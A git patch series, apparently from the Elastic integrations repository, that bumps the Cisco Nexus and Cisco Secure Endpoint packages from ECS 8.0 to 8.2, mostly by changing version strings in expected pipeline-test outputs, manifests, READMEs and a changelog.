@@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:08:51.152643821Z" 
diff --git a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a9946fcdb8c..d916e519ac8 100644 --- a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/cisco_nexus/data_stream/log/sample_event.json b/packages/cisco_nexus/data_stream/log/sample_event.json index 4311c64b9d1..ea998bdb318 100644 --- a/packages/cisco_nexus/data_stream/log/sample_event.json +++ b/packages/cisco_nexus/data_stream/log/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/cisco_nexus/docs/README.md b/packages/cisco_nexus/docs/README.md index 6abaa7a2c52..044aa241b54 100644 --- a/packages/cisco_nexus/docs/README.md +++ b/packages/cisco_nexus/docs/README.md @@ -29,7 +29,7 @@ An example event for `log` looks as following: "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/cisco_nexus/manifest.yml b/packages/cisco_nexus/manifest.yml index e0a643622b1..7979c857a8c 100644 --- a/packages/cisco_nexus/manifest.yml +++ b/packages/cisco_nexus/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_nexus title: Cisco Nexus -version: 0.4.0 +version: 0.5.0 license: basic description: Collect logs from Cisco Nexus with Elastic Agent. type: integration From 9821c1ad97df5e38bdd098748132028491245e6a Mon Sep 17 00:00:00 2001 
From: Taylor Swanson Date: Wed, 23 Feb 2022 12:08:07 -0600 Subject: [PATCH 16/23] Update cisco_secure_endpoint to ECS 8.2 --- .../_dev/build/build.yml | 2 +- packages/cisco_secure_endpoint/changelog.yml | 5 + .../test-cisco-amp1.log-expected.json | 98 ++++----- .../test-cisco-amp2.log-expected.json | 84 ++++---- .../test-cisco-amp3.log-expected.json | 90 ++++---- .../test-cisco-amp4.log-expected.json | 200 +++++++++--------- .../test-cisco-amp5.log-expected.json | 124 +++++------ .../test-cisco-amp6.log-expected.json | 106 +++++----- .../test-cisco-amp7.log-expected.json | 98 ++++----- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/event/sample_event.json | 2 +- packages/cisco_secure_endpoint/docs/README.md | 2 +- packages/cisco_secure_endpoint/manifest.yml | 2 +- 13 files changed, 410 insertions(+), 405 deletions(-) diff --git a/packages/cisco_secure_endpoint/_dev/build/build.yml b/packages/cisco_secure_endpoint/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_secure_endpoint/_dev/build/build.yml +++ b/packages/cisco_secure_endpoint/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml index dda6119c816..10bad37dfed 100644 --- a/packages/cisco_secure_endpoint/changelog.yml +++ b/packages/cisco_secure_endpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.1.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "2.0.0" changes: - description: Update to ECS 8.0 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json index d2a20938e64..96c4828064a 100644 
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json @@ -34,7 +34,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -112,7 +112,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -178,7 +178,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -276,7 +276,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -352,7 +352,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -429,7 +429,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -532,7 +532,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -626,7 +626,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -705,7 +705,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -792,7 +792,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -879,7 +879,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -966,7 +966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1053,7 +1053,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1140,7 +1140,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1225,7 +1225,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", 
@@ -1298,7 +1298,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1371,7 +1371,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1444,7 +1444,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1517,7 +1517,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1591,7 +1591,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1691,7 +1691,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1770,7 +1770,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "File Fetch Completed", @@ -1860,7 +1860,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1939,7 +1939,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected in Low Prevalence Executable", @@ -2012,7 +2012,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "File Fetch Completed", @@ -2090,7 +2090,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -2155,7 +2155,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2227,7 +2227,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -2300,7 +2300,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2380,7 +2380,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", 
@@ -2562,7 +2562,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", @@ -2636,7 +2636,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -2704,7 +2704,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -2791,7 +2791,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -2871,7 +2871,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2950,7 +2950,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3025,7 +3025,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -3091,7 +3091,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3189,7 +3189,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3266,7 +3266,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3364,7 +3364,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3443,7 +3443,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3530,7 +3530,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3631,7 +3631,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", @@ -3731,7 +3731,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", @@ -3861,7 +3861,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", 
@@ -3935,7 +3935,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -3999,7 +3999,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Scan Completed, No Detections", @@ -4058,7 +4058,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Scan Started", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json index f19aa8cf84d..95133cef5be 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json @@ -81,7 +81,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "SecureX Threat Hunting Incident", @@ -176,7 +176,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -279,7 +279,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -378,7 +378,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -483,7 +483,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -591,7 +591,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -699,7 +699,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -807,7 +807,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -915,7 +915,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", 
@@ -1023,7 +1023,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "DFC Threat Detected", @@ -1116,7 +1116,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1197,7 +1197,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1290,7 +1290,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Multiple Infected Files", @@ -1369,7 +1369,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1459,7 +1459,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1545,7 +1545,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1634,7 +1634,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Executed malware", @@ -1716,7 +1716,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1806,7 +1806,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1892,7 +1892,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1978,7 +1978,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2068,7 +2068,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2158,7 +2158,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2244,7 +2244,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2344,7 +2344,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Vulnerable Application Detected", 
@@ -2424,7 +2424,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2514,7 +2514,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2600,7 +2600,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2686,7 +2686,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2776,7 +2776,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2862,7 +2862,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2948,7 +2948,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3028,7 +3028,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3108,7 +3108,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3192,7 +3192,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3291,7 +3291,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3381,7 +3381,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3467,7 +3467,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3553,7 +3553,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3636,7 +3636,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Executed malware", @@ -3715,7 +3715,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", 
@@ -3795,7 +3795,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json index 85789c49765..eed930aea2e 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -34,7 +34,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -114,7 +114,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -198,7 +198,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -282,7 +282,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -366,7 +366,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -450,7 +450,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -534,7 +534,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -618,7 +618,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -702,7 +702,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -786,7 +786,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -870,7 +870,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", 
@@ -954,7 +954,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1038,7 +1038,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1122,7 +1122,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1206,7 +1206,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1290,7 +1290,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1374,7 +1374,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1458,7 +1458,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1538,7 +1538,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1622,7 +1622,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1706,7 +1706,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1794,7 +1794,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1893,7 +1893,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1981,7 +1981,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2080,7 +2080,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2168,7 +2168,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2267,7 +2267,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", 
@@ -2351,7 +2351,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2450,7 +2450,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2530,7 +2530,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2610,7 +2610,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2700,7 +2700,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2786,7 +2786,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2876,7 +2876,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2966,7 +2966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3052,7 +3052,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3142,7 +3142,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3222,7 +3222,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3308,7 +3308,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3388,7 +3388,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3468,7 +3468,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3548,7 +3548,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3638,7 +3638,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", 
@@ -3724,7 +3724,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3814,7 +3814,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json index 489efad675f..4691e88d183 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -34,7 +34,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -121,7 +121,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Executed malware", @@ -203,7 +203,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -279,7 +279,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -356,7 +356,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -451,7 +451,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -545,7 +545,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -638,7 +638,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -727,7 +727,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -799,7 +799,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", 
@@ -875,7 +875,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -951,7 +951,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1027,7 +1027,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1103,7 +1103,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1179,7 +1179,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1255,7 +1255,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1331,7 +1331,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1407,7 +1407,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1483,7 +1483,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1559,7 +1559,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1635,7 +1635,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1711,7 +1711,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1787,7 +1787,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1863,7 +1863,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1939,7 +1939,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2015,7 +2015,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", 
@@ -2092,7 +2092,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2189,7 +2189,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2286,7 +2286,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2387,7 +2387,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2483,7 +2483,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2555,7 +2555,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2627,7 +2627,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2699,7 +2699,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2771,7 +2771,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2847,7 +2847,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2923,7 +2923,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2999,7 +2999,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3075,7 +3075,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3152,7 +3152,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3255,7 +3255,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3353,7 +3353,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", 
